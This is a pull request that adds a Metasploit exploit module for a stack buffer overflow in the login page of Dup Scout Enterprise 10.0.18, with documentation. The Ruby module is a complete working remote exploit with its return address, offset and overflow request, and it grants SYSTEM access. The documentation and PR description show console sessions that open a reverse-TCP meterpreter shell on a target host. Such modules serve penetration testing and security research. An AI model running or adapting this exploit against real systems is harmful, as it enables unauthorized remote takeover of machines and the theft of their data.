### PR TITLE
Add Dup Scout Enterprise login buffer overflow

### DIFF
--- a/documentation/modules/exploit/windows/http/dup_scout_enterprise_login_bof.md
+++ b/documentation/modules/exploit/windows/http/dup_scout_enterprise_login_bof.md
@@ -1,0 +1,47 @@
+## Vulnerable Application
+
+  Tested on Windows 10 x64
+
+  Install the application from the link below and enable the web server by going to Tools -> Advanced Options -> Server -> Enable Web Server on Port.
+
+  [Dup Scout Enterprise v 10.0.18](https://www.exploit-db.com/apps/84dcc5fe242ca235b67ad22215fce6a8-dupscoutent_setup_v10.0.18.exe)
+
+## Verification Steps
+
+  1. Install the application and set the option above to enable the web server
+  2. Start msfconsole
+  3. Do: ```use exploit/windows/http/dup_scout_enterprise_login_bof```
+  5. Set options and payload
+  6. Do: ```run```
+  7. You should get a shell.
+
+## Options
+
+  **RHOST**
+
+  IP address of the remote host running the server.
+
+  **RPORT**
+
+  Port that the web server is running on.  Default is 80 but it can be changed when setting up the program or in the options.
+
+## Scenarios
+
+  To obtain a shell:
+
+  ```
+msf > use exploit/windows/http/dup_scout_enterprise_login_bof
+msf exploit(windows/http/dup_scout_enterprise_login_bof) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf exploit(windows/http/dup_scout_enterprise_login_bof) > set rhost 192.168.1.171
+rhost => 192.168.1.171
+msf exploit(windows/http/dup_scout_enterprise_login_bof) > set lhost 192.168.1.252
+lhost => 192.168.1.252
+msf exploit(windows/http/dup_scout_enterprise_login_bof) > run
+
+[*] Started reverse TCP handler on 192.168.1.252:4444
+[*] Generating exploit...
+[*] Triggering the exploit now...
+[*] Sending stage (179779 bytes) to 192.168.1.171
+[*] Meterpreter session 1 opened (192.168.1.252:4444 -> 192.168.1.171:58969) at 2017-12-09 02:01:41 -0600
+  ```

--- a/modules/exploits/windows/http/dup_scout_enterprise_login_bof.rb
+++ b/modules/exploits/windows/http/dup_scout_enterprise_login_bof.rb
@@ -1,0 +1,101 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Dup Scout Enterprise Login Buffer Overflow',
+      'Description'    => %q{
+        This module exploits a stack buffer overflow in Dup Scout Enterprise
+        10.0.18. The buffer overflow exists via the web interface during
+        login. This gives NT AUTHORITY\SYSTEM access.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Chris Higgins', # msf Module -- @ch1gg1ns
+          'sickness' # Original discovery
+        ],
+      'References'     =>
+        [
+          [ 'EDB', '43145' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread'
+        },
+      'Platform'       => 'win',
+      'Payload'        =>
+        {
+          'BadChars' => "\x00\x0a\x0d\x25\x26\x2b\x3d"
+        },
+      'Targets'        =>
+        [
+          [ 'Dup Scout Enterprise 10.0.18',
+            {
+              'Ret' => 0x10090c83, # jmp esp - libspp.dll
+              'Offset' => 780
+            }
+          ],
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => 'Nov 14 2017',
+      'DefaultTarget'  => 0))
+
+    register_options([Opt::RPORT(80)])
+
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri'    => '/',
+      'method' => 'GET'
+    })
+
+    if res and res.code == 200 and res.body =~ /Dup Scout Enterprise v10\.0\.18/
+      return Exploit::CheckCode::Appears
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    connect
+
+    print_status("Generating exploit...")
+
+    evil =  rand_text(target['Offset'])
+    evil << [target.ret].pack('V')
+    evil << make_nops(12)
+    evil << payload.encoded
+    evil << make_nops(10000 - evil.length)
+
+    print_status("Evil length: " + evil.length.to_s)
+
+    sploit =  "username="
+    sploit << evil
+    sploit << "&password="
+    sploit << rand_text(evil.length)
+    sploit << "\r\n"
+
+    print_status("Triggering the exploit now...")
+
+    res = send_request_cgi({
+      'uri' => '/login',
+      'method' => 'POST',
+      'content-type' => 'application/x-www-form-urlencoded',
+      'content-length' => '17000',
+      'data' => sploit
+    })
+
+    handler
+    disconnect
+
+  end
+end

--- a/modules/exploits/windows/http/dup_scout_enterprise_login_bof.rb
+++ b/modules/exploits/windows/http/dup_scout_enterprise_login_bof.rb
@@ -76,7 +76,7 @@ class MetasploitModule < Msf::Exploit::Remote
     evil << payload.encoded
     evil << make_nops(10000 - evil.length)
 
-    print_status("Evil length: " + evil.length.to_s)
+    vprint_status("Evil length: " + evil.length.to_s)
 
     sploit =  "username="
     sploit << evil


### PR DESCRIPTION
Converted [POC](https://www.exploit-db.com/exploits/43145/) exploit for Dup Scout Enterprise v10.0.18. Also adds documentation for the module.

## Verification

- [x] Start `msfconsole`
- [x] `use exploit/windows/http/dup_scout_enterprise_login_bof`
- [x] `set payload windows/meterpreter/reverse_tcp`
- [x] `set RHOST x.x.x.x`
- [x] `set LHOST y.y.y.y`
- [x] `exploit`
- [x] **Verify** the exploit worked and you received a session

```
msf > use exploit/windows/http/dup_scout_enterprise_login_bof
msf exploit(windows/http/dup_scout_enterprise_login_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/http/dup_scout_enterprise_login_bof) > set rhost 192.168.1.171
rhost => 192.168.1.171
msf exploit(windows/http/dup_scout_enterprise_login_bof) > set lhost 192.168.1.252
lhost => 192.168.1.252
msf exploit(windows/http/dup_scout_enterprise_login_bof) > run

[*] Started reverse TCP handler on 192.168.1.252:4444
[*] Generating exploit...
[*] Triggering the exploit now...
[*] Sending stage (179779 bytes) to 192.168.1.171
[*] Meterpreter session 1 opened (192.168.1.252:4444 -> 192.168.1.171:58969) at 2017-12-09 02:01:41 -0600
```
